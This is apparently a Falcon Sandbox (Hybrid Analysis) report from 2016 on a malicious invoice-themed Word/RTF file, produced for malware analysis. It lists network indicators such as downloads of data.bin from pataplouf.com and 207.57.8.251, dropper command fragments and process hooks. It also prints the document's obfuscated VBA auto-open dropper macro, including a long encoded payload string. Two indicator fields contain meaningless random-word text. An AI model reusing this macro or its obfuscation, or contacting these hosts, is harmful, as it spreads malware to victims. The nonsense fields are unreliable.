Tincidunt Nibh Incorporated_%invoicea21a.17.rtf
This report is generated from a file or URL submitted to this webservice on August 15th 2016 16:22:20 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v5.00 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 1 domain and 2 hosts. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 10
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin" (SID: 2018052, Rev: 6, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
Detected alert "ET TROJAN Generic .bin download from Dotted Quad" (SID: 2018752, Rev: 9, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.) - source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 1/55 Antivirus vendors marked sample as malicious (1% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Emerging Threats Alert
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET /data.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: pataplouf.com
Connection: Keep-Alive"
"GET /data.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 207.57.8.251
Connection: Keep-Alive" - source
- Network Traffic
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Found indicators of dropper code in the commandline
- details
-
Found "... 5" "DIjnB9.SenD()" "PbFk= ..." on invoke of cmd.exe (Show Process)
Found "... ycJ DIjnB9.rESpONsebody" "Lvh=63" ..." on invoke of cmd.exe (Show Process), Found "... i9=59" "Ay.SavEtoFile M9 & SjRh ..." on invoke of cmd.exe (Show Process) - source
- Monitored Target
- relevance
- 5/10
-
Shows malicious Office specific indicators
- details
- The file contains VBA macros and spawned processes in a way typical for malicious Office files
- source
- Indicator Combinations
- relevance
- 10/10
-
Found indicators of dropper code in the commandline
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "213.186.33.168" (ASN: 16276, Owner: OVH SAS): ...
URL: http://www.biscani-club.org/ (AV positives: 1/68 scanned on 08/15/2016 11:48:40)
URL: http://pataplouf.com/ (AV positives: 3/68 scanned on 08/15/2016 10:58:17)
URL: http://pataplouf.com/data.bin (AV positives: 8/68 scanned on 08/15/2016 06:09:13)
URL: http://pataplouf.com/sunglasses/ (AV positives: 2/68 scanned on 08/12/2016 19:18:28)
URL: http://pataplouf.com/data.bin%20HTTP/1.1 (AV positives: 3/68 scanned on 08/12/2016 19:09:38)
File SHA256: 1bd5fd9eb69e4e306cdc28ec6ee6a9db68f78ee767c5e09033ef66528d610a36 (AV positives: 15/54 scanned on 08/09/2016 10:48:18)
File SHA256: 0c8b939254627f5ad28de26ac2b143cdc7de49467f8097570050c48934d5a44b (AV positives: 1/53 scanned on 07/18/2016 10:37:19)
File SHA256: 5af506d60609a2e98a50707e32aee78b9b20402e603b3f55d03c3f8bccb63492 (AV positives: 1/55 scanned on 04/13/2016 05:58:38)
File SHA256: ba9ffd1fbb0a03dab0955439b4b25ae29c50d42e08b4bbb5408e07e22d43c2b8 (AV positives: 3/57 scanned on 04/11/2016 00:01:26)
File SHA256: 91a08334c89365e1c9c90cb0f5a8881e67141b21ac1683232ffcb125e3a970b7 (AV positives: 28/54 scanned on 01/31/2016 05:12:38) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
System Security
-
References security related windows services
- details
- "Cutchery cineast dailiness livered coactions epicalyces perturbment teleangiectasia unrefreshed centro smilemaker surceased request remembrance's. Tythes nonphrenetically gemstones erythrozyme preinjury louringness automation childwife. Outfrowned opalescing pregeological picadura prepossess viewings. Stoof prehnitic undefaming kotowers crocused forespake sulphatic sylvite mumblebee webfeet fungus platinichloride patrocinate nobleman. Stonefly apostrophe radiograms dousing cerebellar cleanly fairling."
- source
- File/Memory
- relevance
- 7/10
-
References security related windows services
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Document contacts a domain
- details
- This kind of behavior is often seen on document exploits or macros utilized as a dropper
- source
- Indicator Combinations
- relevance
- 3/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Suspicious Indicators 10
-
Anti-Reverse Engineering
-
Possibly checks for known debuggers/analysis tools
- details
- "Guidage mean dissection apprenticehood byrrus boughed prover kisaeng dexterity concolour fantasy filthless preserveress. Lomentlike linear discriminators hained." (Indicator: "ntice")
- source
- File/Memory
- relevance
- 2/10
-
Possibly checks for known debuggers/analysis tools
-
Installation/Persistance
-
Executes a visual basic script
- details
- Process "wscript.exe" with commandline ""%APPDATA%\17160.vbs"" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
"WINWORD.EXE" touched file "C:\Windows\system32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C64C600A-AAEE-47D7-BF9F-EA7D4A029D89}.tmp"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\MSCTF.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{51DD4C89-F05C-49E8-8D65-02A379E56D57}.tmp"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{43E59D0F-E69F-45E4-B6A0-051118A152EA}.tmp" - source
- API Call
- relevance
- 7/10
-
Executes a visual basic script
-
Network Related
-
Found potential IP address in binary/memory
- details
- "207.57.8.251"
- source
- File/Memory
- relevance
- 3/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Found potential IP address in binary/memory
-
System Security
-
Hooks API calls
- details
-
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
- Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string with suspicious keywords
- details
-
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)" - source
- File/Memory
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "d62f78aa" to virtual address "0x6B5E10AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e9c532a1ee" to virtual address "0x77476143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baace2400068dcf5166bc3" to virtual address "0x059C5494"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba2ce3400068dcf5166bc3" to virtual address "0x059C54D4"
"WINWORD.EXE" wrote bytes "976b7c5b" to virtual address "0x6EDE3408" (part of module "MSCSS7EN.DLL")
"WINWORD.EXE" wrote bytes "ea6244aa" to virtual address "0x6B4D9904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "e99e4828ee" to virtual address "0x77623D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "055d7e62" to virtual address "0x6BE0CA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baace1400068dcf5166bc3" to virtual address "0x059C5414"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba2ce2400068dcf5166bc3" to virtual address "0x059C5454"
"WINWORD.EXE" wrote bytes "e936558aee" to virtual address "0x77043EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "95550122" to virtual address "0x2F471B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba6ce1400068dcf5166bc3" to virtual address "0x059C53F4"
"WINWORD.EXE" wrote bytes "b811110000663d33c0bac0d49e0568dcf5166bc3" to virtual address "0x059C53B4"
"WINWORD.EXE" wrote bytes "b800000000663d33c0baece2400068dcf5166bc3" to virtual address "0x059C54B4"
"WINWORD.EXE" wrote bytes "0883c40c" to virtual address "0x6B2D1F20" (part of module "GKWORD.DLL")
"WINWORD.EXE" wrote bytes "e923998cee" to virtual address "0x77045DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba6ce3400068dcf5166bc3" to virtual address "0x059C54F4"
"WINWORD.EXE" wrote bytes "c4ca617780bb617752ba61779fbb617708bb617746ce617761386277de2f6277d0d96177000000001779de774f91de777f6fde77f4f7de7711f7de77f283de77857ede7700000000" to virtual address "0x6EBA1000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "5aa3dc68" to virtual address "0x6AC02A00" (part of module "CSS7DATA0009.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 1 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 10
-
General
-
Contacts domains
- details
- "pataplouf.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"213.186.33.168:80"
"207.57.8.251:80" - source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Dim NtS7() As Integer
Dim TlL(7675 + 1325) As Long, VryMC(28197180 / 2820) As Long
Private Function Fort(O1, T7BZ)
Gbrj = 81
Select Case Gbrj
Case 45
Gbrj = Gbrj + 1
Case 79
Gbrj = Gbrj + Gbrj
Case Else
Gbrj = Gbrj - 1
End Select
Fort = (O1 And Not T7BZ) Or (Not O1 And T7BZ)
MQDFttT = 92
Select Case MQDFttT
Case 77
MQDFttT = MQDFttT + 1
Case 69
MQDFttT = MQDFttT + MQDFttT
Case Else
MQDFttT = MQDFttT - 1
End Select
End Function
Private Sub dOcument_oPen()
DHeD8 = 93
Select Case DHeD8
Case 74
DHeD8 = DHeD8 + 1
Case 79
DHeD8 = DHeD8 + DHeD8
Case Else
DHeD8 = DHeD8 - 1
End Select
On Error Resume Next
IFH = 11
Select Case IFH
Case 80
IFH = IFH + 1
Case 72
IFH = IFH + IFH
Case Else
IFH = IFH - 1
End Select
Dim S54RjNv As Long, Ggz6 As Long, XRtWI0 As Long
Ko = 43
Select Case Ko
Case 12
Ko = Ko + 1
Case 77
Ko = Ko + Ko
Case Else
Ko = Ko - 1
End Select
S54RjNv = 95912
QKAGYc = 30
Select Case QKAGYc
Case 78
QKAGYc = QKAGYc + 1
Case 78
QKAGYc = QKAGYc + QKAGYc
Case Else
QKAGYc = QKAGYc - 1
End Select
For Ggz6 = 1 To S54RjNv
XRtWI0 = XRtWI0 + 1
Next Ggz6
AVad5 = 84
Select Case AVad5
Case 72
AVad5 = AVad5 + 1
Case 8
AVad5 = AVad5 + AVad5
Case Else
AVad5 = AVad5 - 1
End Select
If XRtWI0 = S54RjNv Then
QQbpKyS = 77
Select Case QQbpKyS
Case 20
QQbpKyS = QQbpKyS + 1
Case 67
QQbpKyS = QQbpKyS + QQbpKyS
Case Else
QQbpKyS = QQbpKyS - 1
End Select
Dim U3s0i As Integer, UrAhEt As String
For U3s0i = 8 To 959
UrAhEt = UrAhEt + U3s0i
Next
CC8ntxf = 3
Select Case CC8ntxf
Case 19
CC8ntxf = CC8ntxf + 1
Case 97
CC8ntxf = CC8ntxf + CC8ntxf
Case Else
CC8ntxf = CC8ntxf - 1
End Select
Di
Else
EFf = 33
Select Case EFf
Case 39
EFf = EFf + 1
Case 23
EFf = EFf + EFf
Case Else
EFf = EFf - 1
End Select
VT
BvnbXWR = 18
Select Case BvnbXWR
Case 86
BvnbXWR = BvnbXWR + 1
Case 78
BvnbXWR = BvnbXWR + BvnbXWR
Case Else
BvnbXWR = BvnbXWR - 1
End Select
End If
CTmlZW = 83
Select Case CTmlZW
Case 88
CTmlZW = CTmlZW + 1
Case 28
CTmlZW = CTmlZW + CTmlZW
Case Else
CTmlZW = CTmlZW - 1
End Select
End Sub
Private Function Q7nz(ByVal UfFOB As Variant) As Long
GKPl9 = 56
Select Case GKPl9
Case 10
GKPl9 = GKPl9 + 1
Case 48
GKPl9 = GKPl9 + GKPl9
Case Else
GKPl9 = GKPl9 - 1
End Select
On Error GoTo Up71QYB
OuTjI0N = 43
Select Case OuTjI0N
Case 21
OuTjI0N = OuTjI0N + 1
Case 16
OuTjI0N = OuTjI0N + OuTjI0N
Case Else
OuTjI0N = OuTjI0N - 1
End Select
Dim Yq6Vjw As Long, NN0 As Variant
UUmTox = 12
Select Case UUmTox
Case 53
UUmTox = UUmTox + 1
Case 56
UUmTox = UUmTox + UUmTox
Case Else
UUmTox = UUmTox - 1
End Select
Do
NN0 = UfFOB(Yq6Vjw)
Yq6Vjw = Yq6Vjw + 1
Loop
Xoet = 87
Select Case Xoet
Case 3
Xoet = Xoet + 1
Case 82
Xoet = Xoet + Xoet
Case Else
Xoet = Xoet - 1
End Select
Up71QYB:
F3kS = 53
Select Case F3kS
Case 84
F3kS = F3kS + 1
Case 64
F3kS = F3kS + F3kS
Case Else
F3kS = F3kS - 1
End Select
If Yq6Vjw = 0 Then Exit Function
Q0c = 62
Select Case Q0c
Case 44
Q0c = Q0c + 1
Case 70
Q0c = Q0c + Q0c
Case Else
Q0c = Q0c - 1
End Select
Q7nz = Yq6Vjw - 1
TgPS = 3
Select Case TgPS
Case 22
TgPS = TgPS + 1
Case 62
TgPS = TgPS + TgPS
Case Else
TgPS = TgPS - 1
End Select
End Function
Private Function VzdG(Xdr As Long, LQObi As Long) As Byte
BOHEm = 14
Select Case BOHEm
Case 60
BOHEm = BOHEm + 1
Case 94
BOHEm = BOHEm + BOHEm
Case Else
BOHEm = BOHEm - 1
End Select
Dim Jo As Long, B9SLcgq As Long
Oi = 86
Select Case Oi
Case 28
Oi = Oi + 1
Case 31
Oi = Oi + Oi
Case Else
Oi = Oi - 1
End Select
For Jo = (-7762 + 7810) To (106533 / 1869)
If TpMon(Xdr, LQObi, 1) = B9SLcgq Then VzdG = Jo: Exit For
B9SLcgq = B9SLcgq + 1
Next Jo
OatZx3f = 36
Select Case OatZx3f
Case 33
OatZx3f = OatZx3f + 1
Case 43
OatZx3f = OatZx3f + OatZx3f
Case Else
OatZx3f = OatZx3f - 1
End Select
End Function
Private Function TpMon(ByVal Vns3Q2h As String, ByVal KQd As Long, ByVal NqNSJqe As Variant) As String
KKlk = 31
Select Case KKlk
Case 60
KKlk = KKlk + 1
Case 46
KKlk = KKlk + KKlk
Case Else
KKlk = KKlk - 1
End Select
Dim M5Ksdf() As Byte, AypVl() As Byte, Spba9 As Long, GCI As Long
GGIW9l = 12
Select Case GGIW9l
Case 93
GGIW9l = GGIW9l + 1
Case 21
GGIW9l = GGIW9l + GGIW9l
Case Else
GGIW9l = GGIW9l - 1
End Select
M5Ksdf = Vns3Q2h
RAZ0Rk9 = 34
Select Case RAZ0Rk9
Case 98
RAZ0Rk9 = RAZ0Rk9 + 1
Case 32
RAZ0Rk9 = RAZ0Rk9 + RAZ0Rk9
Case Else
RAZ0Rk9 = RAZ0Rk9 - 1
End Select
Spba9 = Q7nz(M5Ksdf)
KmS89 = 37
Select Case KmS89
Case 81
KmS89 = KmS89 + 1
Case 23
KmS89 = KmS89 + KmS89
Case Else
KmS89 = KmS89 - 1
End Select
KQd = (KQd - 1) * 2
PWds = 79
Select Case PWds
Case 2
PWds = PWds + 1
Case 35
PWds = PWds + PWds
Case Else
PWds = PWds - 1
End Select
NqNSJqe = (NqNSJqe * 2) - 1
CDJqEq = 62
Select Case CDJqEq
Case 65
CDJqEq = CDJqEq + 1
Case 83
CDJqEq = CDJqEq + CDJqEq
Case Else
CDJqEq = CDJqEq - 1
End Select
If KQd + NqNSJqe > Spba9 Then NqNSJqe = Spba9 - KQd
Wvpqo = 12
Select Case Wvpqo
Case 91
Wvpqo = Wvpqo + 1
Case 52
Wvpqo = Wvpqo + Wvpqo
Case Else
Wvpqo = Wvpqo - 1
End Select
ReDim AypVl(NqNSJqe)
MOOR = 38
Select Case MOOR
Case 66
MOOR = MOOR + 1
Case 52
MOOR = MOOR + MOOR
Case Else
MOOR = MOOR - 1
End Select
For GCI = KQd To KQd + NqNSJqe
AypVl(GCI - KQd) = M5Ksdf(GCI)
Next GCI
W3SrWp = 70
Select Case W3SrWp
Case 53
W3SrWp = W3SrWp + 1
Case 79
W3SrWp = W3SrWp + W3SrWp
Case Else
W3SrWp = W3SrWp - 1
End Select
TpMon = AypVl
B3gz = 93
Select Case B3gz
Case 58
B3gz = B3gz + 1
Case 91
B3gz = B3gz + B3gz
Case Else
B3gz = B3gz - 1
End Select
End Function
Private Sub Di()
RE = 80
Select Case RE
Case 74
RE = RE + 1
Case 19
RE = RE + RE
Case Else
RE = RE - 1
End Select
Dim JeGYP8r As String
G8T = 24
Select Case G8T
Case 17
G8T = G8T + 1
Case 39
G8T = G8T + G8T
Case Else
G8T = G8T - 1
End Select
Fwz = 66
Select Case Fwz
Case 30
Fwz = Fwz + 1
Case 86
Fwz = Fwz + Fwz
Case Else
Fwz = Fwz - 1
End Select
JeGYP8r = "5235U26455U25332U27326U11010U-23590U8631U-11577U-14282U-20196U9809U-21116U5114U9757U-30238U-12498U14438U11703U22391U-25609U-16193U-4694U25210U-15972U-16221U30285U-3974U25365U3541U916U-7403U16753U26124U-14288U-13480U-15734U-26648U12619U-25329U-16340U-12232U-11250U2250U29960U19876U-15787U29968U-7519U-17078U-15747U-30492U-5170U22052U-29203U7488U16578U4886U21276U12999U17247U-20396U-19021U-11329U-21122U24769U-31090U-18327U19042U-7783U-13941U-620U-3753U-10579U15776U-27632U-19883U-6891U26038U30952U-4998U-20242U31482U-14742U-5330U-24299U-19366U28552U-28552U-16324U-14036U-24306U25041U13666U3563U13441U-14758U-17324U-8329U18830U-24143U8974U4486U15039U18620U32524U32014U19156U11877U-25757U406U31027U16935U14302U-1263U15998U-2718U11258U-32378U-15962U-8053U-10603U-32299U30621U-17671U-12625U4967U-19039U2"
W3 = 61
Select Case W3
Case 18
W3 = W3 + 1
Case 48
W3 = W3 + W3
Case Else
W3 = W3 - 1
End Select
JeGYP8r = JeGYP8r & "6711U-19197U1389U-18375U-31148U-9826U32348U19167U-29307U-12260U24972U-17746U-19578U-31876U-30137U-13993U-14250U14724U28113U25751U-15019U-21019U-11783U-3234U11716U-21904U-32411U5110U-28615U792U17161U-20627U8210U-14831U-2469U-21023U1057U-30481U31878U22888U32644U2901U-29477U-21573U-20130U-27918U27380U-17302U10426U26468U-2997U-16860U-31160U-13040U17445U-8910U25989U30601U8491U9814U-27597U-31044U10201U12172U-25456U25777U14418U-4390U15222U27616U-1670U-17070U-31073U26501U27255U16266U-15476U1480U-19720U-26347U-11478U-25160U17714U27798U-29275U-27939U-29855U30310U18316U-6252U-26069U725U18473U-8106U-8083U21550U-32763U6231U19650U-13418U3902U-27240U-24766U-23712U4675U-23306U14760U5934U17800U10601U-31738U6299U-14984U-17468U-27740U-3668U16138U20550U-559U316U-31295U30042U7253U-3109U23674U6483U18029U11402"
YThN = 89
Select Case YThN
Case 44
YThN = YThN + 1
Case 57
YThN = YThN + YThN
Case Else
YThN = YThN - 1
End Select
JeGYP8r = JeGYP8r & "U17668U-7180U20532U-21314U-2280U28201U-9454U7823U3773U21210U6555U12500U31504U28362U19183U-7744U14738U238U11249U-19514U7335U717U14638U-6035U-2172U-18120U19996U-31545U6541U-11028U-29273U-11434U-2713U-3146U-26173U-25468U27351U26599U-20844U-7154U-10394U-6747U-24912U7003U-16864U122U25645U-23214U-19912U1125U-23496U9699U9199U1272U-9710U-32736U-32500U8794U15945U-14025U-23313U26016U28809U-15034U29525U-5678U5039U-5688U-6258U-20018U-29011U-8214U14393U-12761U-27039U-22338U-2031U16144U19523U-17635U-13808U16383U-27540U-23042U10619U23309U-22976U-12043U-17043U12560U23191U558U-30488U11481U26468U16293U25880U-1238U-8000U11522U-2489U5813U-8244U18925U-3061U27826U6765U-6298U-18566U6084U26829U17102U28846U-1977U26929U-32085U-29668U-32292U-15705U6888U28788U5698U2571U-23942U24365U10776U10683U6087U1833U26323U16155"
SzV4 = 85
Select Case SzV4
Case 84
SzV4 = SzV4 + 1
Case 15
SzV4 = SzV4 + SzV4
Case Else
SzV4 = SzV4 - 1
End Select
JeGYP8r = JeGYP8r & "U-29098U-1128U15176U-2386U-1252U-2953U-10072U6097U-1245U-28372U-3472U4832U-24268U4930U-32571U-3638U10985U18439U-28614U-12383U-3689U4751U29083U594U-31079U-4882U-25138U-25309U-19849U-12215U17358U-23121U25873U29063U5361U-9926U-12794U102U5611U14753U11066U23844U-6606U-31171U17485U-30915U-14140U-7831U17244U16203U-11202U21564U-3999U-11910U10973U-22452U-28354U-10169U-7440U-18152U-6085U3916U-1416U24637U25058U21271U6094U-15582U11824U-1606U-15686U3421U-10874U23639U6202U-18813U-22622U18749U-24898U-18975U-12817U-26093U-16487U22709U-22847U1989U-16857U708U29600U1378U-24739U5729U-13072U13582U6711U31390U-24989U19991U-13802U-3680U12308U-12959U8868U-17188U-16211U10276U8073U-9288U-7305U27255U22383U-8062U-7272U-6964U204U20843U-4597U23081U-21057U-3848U2941U-17907U-14474U471U-4201U31269U25505U19378U-22489U-126"
GDT = 21
Select Case GDT
Case 79
GDT = GDT + 1
Case 49
GDT = GDT + GDT
Case Else
GDT = GDT - 1
End Select
JeGYP8r = JeGYP8r & "45U-9249U3331U18298U-6225U8376U32277U21498U21115U-1141U-3633U20286U-19908U-23445U-1398U15142U-27928U-3846U-3017U-16569U-27937U24861U-15578U23924U-19810U15121U-8672U11742U11103U31680U-16068U-5682U13043U2176U19319U-22782U-2860U-27853U19746U-13923U15716U-21825U-15099U-24908U-11564U20899U7866U15813U1364U32225U8567U9881U-12564U-30930U1467U-10502U-6453U-26247U21567U29530U19171U18457U5137U11663U16849U27403U-19074U29367U-25441U-25678U-9930U-28971U-21569U24815U-8520U566U23584U22797U13766U-19805U-25950U-25073U-5731U-16743U854U-31957U-20751U22621U11892U24798U-29926U21333U-22774U-22342U19976U6798U6987U30270U-7958U17120U5157U-1412U10733U22897U30873U1193U-18494U-7491U-16934U21217U-26612U-10882U-1855U-10024U18167U27306U2110U25430U-4584U10897U30202U-1070U10943U-17220U3406U-26069U7913U-32385U2598U-8455U-"
ELifKrt = 74
Select Case ELifKrt
Case 78
ELifKrt = ELifKrt + 1
Case 18
ELifKrt = ELifKrt + ELifKrt
Case Else
ELifKrt = ELifKrt - 1
End Select
JeGYP8r = JeGYP8r & "9284U29295U-22475U23982U-12866U-8521U-30252U-14273U17111U-6078U14409U-12340U-21575U2204U21208U32461U-25242U-20167U22253U32070U-16582U11556U-10348U27534U-11768U-21756U16699U13997U-13799U30312U-6004U21186U32682U-8576U-18153U31805U-24384U18196U-23589U-14714U-8146U23822U150U-12184U23663U22501U-29099U-16012U-21298U4757U-28088U30000U-20906U16405U18979U8239U-28054U-12779U-27517U16848U-24854U-20316U-9006U14353U-23082U18598U-12709U10288U-9165U25425U14659U2398U20161U-2062U-31072U1330U17142U24860U-18648U-20304U-20818U4234U-28828U-14310U19777U-19181U13405U10529U25651U31273U-7350U23086U3155U32212U-11219U19970U30088U8587U-21281U-9081U-1895U19477U19323U-12684U14536U-31875U-20287U-3522U-17534U-19312U5800U17411U-23070U-2510U31883U22605U18286U1716U11494U26284U13315U-22783U22311U13530U462U-27063U28019U8874"
FIYNacR = 68
Select Case FIYNacR
Case 23
FIYNacR = FIYNacR + 1
Case 60
FIYNacR = FIYNacR + FIYNacR
Case Else
FIYNacR = FIYNacR - 1
End Select
JeGYP8r = JeGYP8r & "U-28195U-29309U26283U10332U26758U-12610U-30037U-25623U-5942U5024U-15203U2184U670U-695U18061U25941U19160U19925U2652U32508U25505U2997U-19504U-27877U14005U-29209U14865U-995U-8472U21295U-9795U3749U-30288U-26248U710U-21397U11250U-18964U-7159U-26318U7750U-19347U25061U9537U-1470U-14344U-12300U1934U-16889U-10999U-9533U-88U22284U5375U9243U27690U25362U2986U-18236U3359U-8127U12077U27052U13365U-21233U-31345U15827U-2871U24885U18524U6308U15629U24813U25765U-15814U-21528U-32376U-26881U-26340U19670U-14625U-19445U-13780U-32093U1425U-933U-2306U18754U8205U8052U928U29604U1609U1391U-32571U-27217U-23837U7245U15424U-3499U8919U14665U527U-4522U-15103U-3417U-18508U-3286U30843U18099U-27719U-696U-1633U-505U2137U20884U-21430U-6841U23256U-13863U23686U-871U8496U6785U12220U11506U30659U15023U-32053U11529U2704U-7763U-1873"
AfAy = 5
Select Case AfAy
Case 98
AfAy = AfAy + 1
Case 43
AfAy = AfAy + AfAy
Case Else
AfAy = AfAy - 1
End Select
JeGYP8r = JeGYP8r & "9U9970U-23275U-6977U-27044U-22396U26262U-3700U-20883U-2341U22749U14030U8066U-19793U-31741U3558U12604U6757U26429U-30963U30056U-32037U13551U-14884U-15156U-12371U25810U15955U-4764U30660U-14775U10920U24645U-16379U26531U-14316U11661U-12825U-6342U21942U12864U23439U-3519U19070U-10720U-6285U2771U-20241U4916U6835U-30879U17192U1705U-21062U-1928U7390U-3254U-14743U26931U-21822U-12636U-20523U-95U-7511U13941U-1586U-21090U9850U-10369U7588U-11481U-31947U30153U-15447U-19519U-17286U3937U-14286U-11859U-7362U-21026U-6045U-2038U-1533U4159U-9319U-10765U25847U-32270U-4804U-21527U2756U10824U22949U7682U-29578U13433U1279U30462U-18140U-3795U-17898U-9730U-5916U-2805U22987U20729U30591U-27373U8475U3958U-13323U2472U-11137U-30815U-12504U-10125U13956U25654U11066U13670U2250U-8802U4342U7046U-3725U20610U-9009U17457U-30929U"
Scni = 19
Select Case Scni
Case 57
Scni = Scni + 1
Case 94
Scni = Scni + Scni
Case Else
Scni = Scni - 1
End Select
JeGYP8r = JeGYP8r & "-13234U-24266U-12988U1552U13769U25546U-10710U23115U-21463U24544U11843U18510U-5482U14708U17978U20759U7237U2984U-14353U6576U7008U5793U-31529U17763U-9786U-2142U-25979U-17824U-23792U4222U-18366U-17540U-16544U28377U5153U-19128U-17754U32032U-24337U-3448U8399U-24078U-31474U21855U-7152U-11415U-25469U26223U-20515U-26975U668U20837U20834U-22278U-30347U-29407U17528U-15988U14158U15560U-14126U26719U-15256U-9442U-7612U-9736U-5997U5198U29488U21232U26928U9705U-3572U-10312U-18U26206U19104U-32333U10217U29819U10856U-11612U-7965U30138U10950U-22170U29681U25251U-16511U-1248U-19331U11041U5394U-30550U-30383U4778U-1648U8862U29470U5563U6784U25849U-8744U-15517U19600U-22884U13167U-5609U7812U1971U10400U19008U-12753U-12217U19259U-6127U-7775U-21127U-16079U-31205U-15290U-28728U20227U12414U-25728U-3306U-17362U28178U-3028"
